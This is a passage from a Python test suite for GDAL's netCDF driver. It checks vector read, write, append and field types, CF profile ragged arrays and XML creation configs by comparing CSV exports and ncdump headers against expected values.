assert 'PROJCS["OSGB 1936' in srs
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
gdal.Unlink('tmp/netcdf_50.nc')
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields
def test_netcdf_51():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
# Test autogrow of string fields
gdal.VectorTranslate('tmp/netcdf_51.nc', ds, format='netCDF', layerCreationOptions=['STRING_DEFAULT_WIDTH=1'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_51.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_51.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_51.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
lyr.CreateField(ogr.FieldDefn('extra', ogr.OFTInteger))
lyr.CreateField(ogr.FieldDefn('extra_str', ogr.OFTString))
f = lyr.GetNextFeature()
assert f is not None
f['extra'] = 5
f['extra_str'] = 'foobar'
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
assert f['int32'] == 1 and f['extra'] == 5 and f['extra_str'] == 'foobar'
f = None
ds = None
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_51.nc', 'auto', False)
gdal.Unlink('tmp/netcdf_51.nc')
gdal.Unlink('tmp/netcdf_51.csv')
gdal.Unlink('tmp/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.csv')
gdal.Unlink('/vsimem/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.prj')
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields with WRITE_GDAL_TAGS=NO
def test_netcdf_51_no_gdal_tags():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('tmp/netcdf_51_no_gdal_tags.nc', ds, format='netCDF', datasetCreationOptions=['WRITE_GDAL_TAGS=NO', 'GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_51_no_gdal_tags.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_51_no_gdal_tags.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_51_no_gdal_tags.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x1,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_51_no_gdal_tags.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String(10),Date,DateTime,DateTime,Real,Real,Integer,Integer,Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.nc')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.prj')
###############################################################################
# Test creating a vector NetCDF 4 file with X,Y,Z fields
def test_netcdf_52():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if gdaltest.netcdf_drv_version in ('4.6.3', '4.7.0'):
pytest.skip('buggy netCDF version: https://github.com/Unidata/netcdf-c/pull/1442')
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('tmp/netcdf_52.nc', ds, format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_52.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_52.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_52.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
assert content == expected_content
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
lyr.CreateField(ogr.FieldDefn('extra', ogr.OFTInteger))
f = lyr.GetNextFeature()
assert f is not None
f['extra'] = 5
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
assert f['int32'] == 1 and f['extra'] == 5
f = None
ds = None
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_52.nc', 'auto', False)
gdal.Unlink('tmp/netcdf_52.nc')
gdal.Unlink('tmp/netcdf_52.csv')
gdal.Unlink('tmp/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.csv')
gdal.Unlink('/vsimem/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.prj')
###############################################################################
# Test creating a vector NetCDF 4 file with WKT geometry field
def test_netcdf_53():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.OpenEx('../ogr/data/poly.shp', gdal.OF_VECTOR)
out_ds = gdal.VectorTranslate('tmp/netcdf_53.nc', ds, format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
out_ds = gdal.OpenEx('tmp/netcdf_53.nc', gdal.OF_VECTOR)
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
assert 'PROJCS["OSGB 1936' in srs
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
gdal.Unlink('tmp/netcdf_53.nc')
###############################################################################
# Test appending to a vector NetCDF 4 file with unusual types (ubyte, ushort...)
def test_netcdf_54():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if gdaltest.netcdf_drv_version in ('4.6.3', '4.7.0'):
pytest.skip('buggy netCDF version: https://github.com/Unidata/netcdf-c/pull/1442')
shutil.copy('data/test_ogr_nc4.nc', 'tmp/netcdf_54.nc')
ds = gdal.OpenEx('tmp/netcdf_54.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f is not None
f['int32'] += 1
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_54.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_54.nc')
assert src_json == out_json
###############################################################################
# Test auto-grow of bidimensional char variables in a vector NetCDF 4 file
def test_netcdf_55():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
shutil.copy('data/test_ogr_nc4.nc', 'tmp/netcdf_55.nc')
ds = gdal.OpenEx('tmp/netcdf_55.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f is not None
f['twodimstringchar'] = 'abcd'
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_55.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_55.nc')
assert src_json == out_json
###############################################################################
# Test truncation of bidimensional char variables and WKT in a vector NetCDF 3 file
def test_netcdf_56():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_56.nc', options=['GEOMETRY_ENCODING=WKT'])
# Test auto-grow of WKT field
lyr = ds.CreateLayer('netcdf_56', options=['AUTOGROW_STRINGS=NO', 'STRING_DEFAULT_WIDTH=5', 'WKT_DEFAULT_WIDTH=5'])
lyr.CreateField(ogr.FieldDefn('txt'))
f = ogr.Feature(lyr.GetLayerDefn())
f['txt'] = '0123456789'
f.SetGeometry(ogr.CreateGeometryFromWkt('POINT (1 2)'))
with gdaltest.error_handler():
ret = lyr.CreateFeature(f)
assert ret == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_56.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
if f['txt'] != '01234' or f.GetGeometryRef() is not None:
f.DumpReadable()
pytest.fail()
ds = None
gdal.Unlink('tmp/netcdf_56.nc')
###############################################################################
# Test one layer per file creation
def test_netcdf_57():
if gdaltest.netcdf_drv is None:
pytest.skip()
try:
shutil.rmtree('tmp/netcdf_57')
except OSError:
pass
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
assert ds is None
open('tmp/netcdf_57', 'wb').close()
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
assert ds is None
os.unlink('tmp/netcdf_57')
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_57', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
for ilayer in range(2):
lyr = ds.CreateLayer('lyr%d' % ilayer)
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTInteger))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = ilayer
lyr.CreateFeature(f)
ds = None
for ilayer in range(2):
ds = ogr.Open('tmp/netcdf_57/lyr%d.nc' % ilayer)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f['lyr_id'] == ilayer
ds = None
shutil.rmtree('tmp/netcdf_57')
###############################################################################
# Test one layer per group (NC4)
def test_netcdf_58():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_58.nc', options=['FORMAT=NC4', 'MULTIPLE_LAYERS=SEPARATE_GROUPS', 'GEOMETRY_ENCODING=WKT'])
for ilayer in range(2):
# Make sure auto-grow will happen to test this works well with multiple groups
lyr = ds.CreateLayer('lyr%d' % ilayer, geom_type=ogr.wkbNone, options=['USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1'])
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = 'lyr_%d' % ilayer
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_58.nc')
for ilayer in range(2):
lyr = ds.GetLayer(ilayer)
f = lyr.GetNextFeature()
assert f['lyr_id'] == 'lyr_%d' % ilayer
ds = None
gdal.Unlink('tmp/netcdf_58.nc')
###############################################################################
# check for UnitType set/get.
def test_netcdf_59():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get
ds = gdal.Open('data/unittype.nc')
unit = ds.GetRasterBand(1).GetUnitType()
assert unit == 'm/s', ('Incorrect unit(%s)' % unit)
ds = None
# set
tst = gdaltest.GDALTest('NetCDF', 'unittype.nc', 1, 4672)
return tst.testSetUnitType()
###############################################################################
# Test reading a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# http://cfconventions.org/cf-conventions/v1.6.0/cf-conventions.html#_indexed_ragged_array_representation_of_profiles
def test_netcdf_60():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx('data/profile.nc', gdal.OF_RASTER)
assert ds is None
ds = gdal.OpenEx('data/profile.nc', gdal.OF_VECTOR)
assert ds is not None
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_60.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_60.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_60.csv')
###############################################################################
# Test appending to a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_61():
if gdaltest.netcdf_drv is None:
pytest.skip()
shutil.copy('data/profile.nc', 'tmp/netcdf_61.nc')
ds = gdal.VectorTranslate('tmp/netcdf_61.nc', 'data/profile.nc', accessMode='append')
gdal.VectorTranslate('/vsimem/netcdf_61.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_61.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_61.csv')
gdal.Unlink('/vsimem/netcdf_61.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_62():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.VectorTranslate('tmp/netcdf_62.nc', 'data/profile.nc', format='netCDF', layerCreationOptions=['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_INIT_SIZE=1',
'PROFILE_VARIABLES=station'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_62.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_62.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_62.csv')
def test_netcdf_62_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_62.nc')
assert ('profile = 2' in ret and \
'record = UNLIMITED' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret and \
'char station(profile' in ret and \
'char foo(record' in ret)
else:
pytest.skip()
def test_netcdf_62_cf_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_62.nc', 'auto', False)
gdal.Unlink('/vsimem/netcdf_62.nc')
###############################################################################
# Test creating a NC4 "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_63():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
shutil.copy('data/profile.nc', 'tmp/netcdf_63.nc')
ds = gdal.VectorTranslate('tmp/netcdf_63.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'],
layerCreationOptions=['FEATURE_TYPE=PROFILE', \
'USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1'])
gdal.VectorTranslate('/vsimem/netcdf_63.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_63.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_63.csv')
def test_netcdf_63_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_63.nc')
assert ('profile = UNLIMITED' in ret and \
'record = UNLIMITED' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret and \
'char station(record' in ret)
else:
gdal.Unlink('/vsimem/netcdf_63.nc')
pytest.skip()
gdal.Unlink('/vsimem/netcdf_63.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# but without a profile field.
def test_netcdf_64():
if gdaltest.netcdf_drv is None:
pytest.skip()
gdal.VectorTranslate('tmp/netcdf_64.nc', 'data/profile.nc', format='netCDF', selectFields=['id,station,foo'], layerCreationOptions=['FEATURE_TYPE=PROFILE',
'PROFILE_DIM_NAME=profile_dim', 'PROFILE_DIM_INIT_SIZE=1', 'LEGACY=WKT'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_64.csv', 'tmp/netcdf_64.nc', format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_64.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile_dim,id,station,foo
"POINT Z (2 49 100)",0,1,Palo Alto,bar
"POINT Z (3 50 50)",1,2,Santa Fe,baz
"POINT Z (2 49 200)",0,3,Palo Alto,baw
"POINT Z (3 50 100)",1,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_64.csv')
gdal.Unlink('/vsimem/netcdf_64.nc')
###############################################################################
# Test creating a NC4 file with empty string fields / WKT fields
# (they must be filled as empty strings to avoid crashes in netcdf lib)
def test_netcdf_65():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_65.nc', options=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
lyr = ds.CreateLayer('test')
lyr.CreateField(ogr.FieldDefn('str', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_65.nc')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f['str'] != '':
f.DumpReadable()
pytest.fail()
ds = None
gdal.Unlink('tmp/netcdf_65.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# from a config file
def test_netcdf_66():
if gdaltest.netcdf_drv is None:
pytest.skip()
# First trying with no so good configs
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=not_existing'])
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=<Configuration>'])
myconfig = \
"""<Configuration>
<!-- comment -->
<unrecognized_elt/>
<DatasetCreationOption/>
<DatasetCreationOption name="x"/>
<DatasetCreationOption value="x"/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
<Field name="x">
<!-- comment -->
<unrecognized_elt/>
</Field>
<Field name="station" main_dim="non_existing"/>
<Layer/>
<Layer name="x">
<!-- comment -->
<unrecognized_elt/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
</Layer>
</Configuration>
"""
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=' + myconfig, 'GEOMETRY_ENCODING=WKT'])
# Now with a correct configuration
myconfig = \
"""<Configuration>
<DatasetCreationOption name="WRITE_GDAL_TAGS" value="NO"/>
<LayerCreationOption name="STRING_DEFAULT_WIDTH" value="1"/>
<Attribute name="foo" value="bar"/>
<Attribute name="foo2" value="bar2"/>
<Field name="id">
<Attribute name="my_extra_attribute" value="5.23" type="double"/>
</Field>
<Field netcdf_name="lon"> <!-- edit predefined variable -->
<Attribute name="my_extra_lon_attribute" value="foo"/>
</Field>
<Layer name="profile" netcdf_name="my_profile">
<LayerCreationOption name="FEATURE_TYPE" value="PROFILE"/>
<LayerCreationOption name="RECORD_DIM_NAME" value="obs"/>
<Attribute name="foo" value="123" type="integer"/> <!-- override global one -->
<Field name="station" netcdf_name="my_station" main_dim="obs">
<Attribute name="long_name" value="my station attribute"/>
</Field>
<Field netcdf_name="lat"> <!-- edit predefined variable -->
<Attribute name="long_name" value=""/> <!-- remove predefined attribute -->
</Field>
</Layer>
</Configuration>
"""
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=' + myconfig, 'GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_66.csv', 'tmp/netcdf_66.nc', format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_66.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,my_station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_66.csv')
def test_netcdf_66_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_66.nc')
assert ('char my_station(obs, my_station_max_width)' in ret and \
'my_station:long_name = "my station attribute"' in ret and \
'lon:my_extra_lon_attribute = "foo"' in ret and \
'lat:long_name' not in ret and \
'id:my_extra_attribute = 5.23' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret)
else:
gdal.Unlink('/vsimem/netcdf_66.nc')
pytest.skip()
gdal.Unlink('/vsimem/netcdf_66.nc')
###############################################################################
